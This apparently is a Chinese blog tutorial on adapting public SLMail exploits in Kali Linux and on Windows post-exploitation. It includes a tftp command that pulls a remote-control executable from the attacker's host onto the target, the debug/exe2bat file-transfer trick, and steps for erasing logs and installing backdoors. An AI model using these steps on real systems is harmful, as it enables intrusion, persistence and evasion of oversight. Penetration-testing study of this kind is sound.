kali linux之选择和修改exp与windows后渗透

网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......)

类unix坏境下编译

返回地址和环境不符合

反弹shell硬编码了回链IP地址

缓冲区偏移量与我们的环境不符

目标IP硬编码

如下测试

查找slmail的exp

kali linux之选择和修改exp与windows后渗透

把exp复制到当前目录下进行修改测试

kali linux之选择和修改exp与windows后渗透

vim 638.py

kali linux之选择和修改exp与windows后渗透

vim 643.c

kali linux之选择和修改exp与windows后渗透

避免有害的exp,避免一锤子测试,满足不同环境需要,了解漏洞远离,修改溢出代码

漏洞利用后阶段:

上传工具(linux-----netcat----curl---wget。windows-----缺少预装的下载工具)

提权

擦除攻击痕迹(中间件日志,系统日志)

安装后门(dump密码,内网渗透)

后漏洞利用阶段(最大的挑战-----杀软,使用合法的远控)

windows命令行不方便操作,最好能把远程控制的软件上传到服务器上,方便后续操作

例如使用ftp来传输远控(ftp就不演示了,简单)

xp,03默认安装了,08需要单独添加,而且经常被边界防火墙过滤

思路就是在kali生成一个远控,或者其他更好的工具,本机开启tftp服务,在windows命令行下下载kali本机的远程控制工具(win:tftp -i 192.168.1.10 get xxsec.exe)

使用debug传输

汇编,反汇编,16进制dump工具,一次只能传输64k字节,可以使用upx压缩文件

kali linux之选择和修改exp与windows后渗透

用exe2bat把二进制转换成16进制的表示(exe2bat是windows程序,要用wine来执行)

kali linux之选择和修改exp与windows后渗透

exe2bat会把所有代码都生成好,复制好这些代码,除了最后两行,最后两行要在debug上操作

kali linux之选择和修改exp与windows后渗透

把复制好的代码粘贴到windows的shell上,这时dir查看一下,能看到一个123.hexdir的文件

kali linux之选择和修改exp与windows后渗透

然后到debug了,把x.txt的倒数第二行粘贴到windows的shell里面执行(123.hex作为输入,传输给debug)

kali linux之选择和修改exp与windows后渗透

完成后,dir查看会多出来一个1.DLL的文件

kali linux之选择和修改exp与windows后渗透

然后对它进行重命名

kali linux之选择和修改exp与windows后渗透

再次dir查看,远控工具就上传上去了

kali linux之选择和修改exp与windows后渗透

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

上一篇:HDUOJ--2121--Ice_cream’s world II【朱刘算法】不定根最小树形图


下一篇:Uva 11183 - Teen Girl Squad (最小树形图)